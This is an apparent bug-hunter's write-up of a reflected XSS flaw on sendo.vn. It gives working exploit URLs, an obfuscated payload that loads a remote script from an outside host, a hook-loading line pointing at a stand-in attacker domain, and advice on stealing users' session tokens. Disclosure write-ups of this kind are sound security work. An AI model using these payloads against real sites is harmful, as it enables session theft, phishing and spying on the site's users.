Sendo.vn reflected XSS
No brainer, inserting "/><script>alert(1337)</script>
to different places in the URL is my first step. I found an XSS but exploitation requires bypassing Chrome XSS auditor:
GET /cong-nghe/may-da-qua-su-dung/?%3E'%22%3E%3Cscript%3Ealert(906)%3C/script%3E
Let's try something else. Reading the source code for a while, I found this:
https://www.sendo.vn/cong-nghe/may-da-qua-su-dung/dien-thoai-cu/?category_id=1&sortType=vasup_desc&hang_san_xuat_2=1'%2Balert(1337)%2B'
and click on a tick box
Exploitation
In real-life scenario, hacker can easily setup BeFF as an exploitation framework and load its hook.js (or his own) with document.write('https://evilwebsite.tld/hook.js');
example payload:
https://www.sendo.vn/cong-nghe/may-da-qua-su-dung/dien-thoai-cu/?category_id=1&sortType=vasup_desc&hang_san_xuat_2=1'%2Bdocument.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,115,58,47,47,112,119,110,101,114,105,115,46,115,117,114,103,101,46,115,104,47,114,105,99,107,114,111,108,108,46,106,115,34,62,60,47,115,99,114,105,112,116,62))%2B'
Now hacker might spy every activity on Sendo of users who visited a hacker's crafted URL (screen capturing, keylogging...), tamper the UI (phising attack), and use their logged-in sessions to perform some mischievous actions.
...Or lazily make XHR GET requests to https://www.sendo.vn/general/login/getSession/ and steal victims' tokens.
Bonus: http://www.xss-payloads.com/payloads-list.html?a#category=all
This post is for educational purpose only
Comments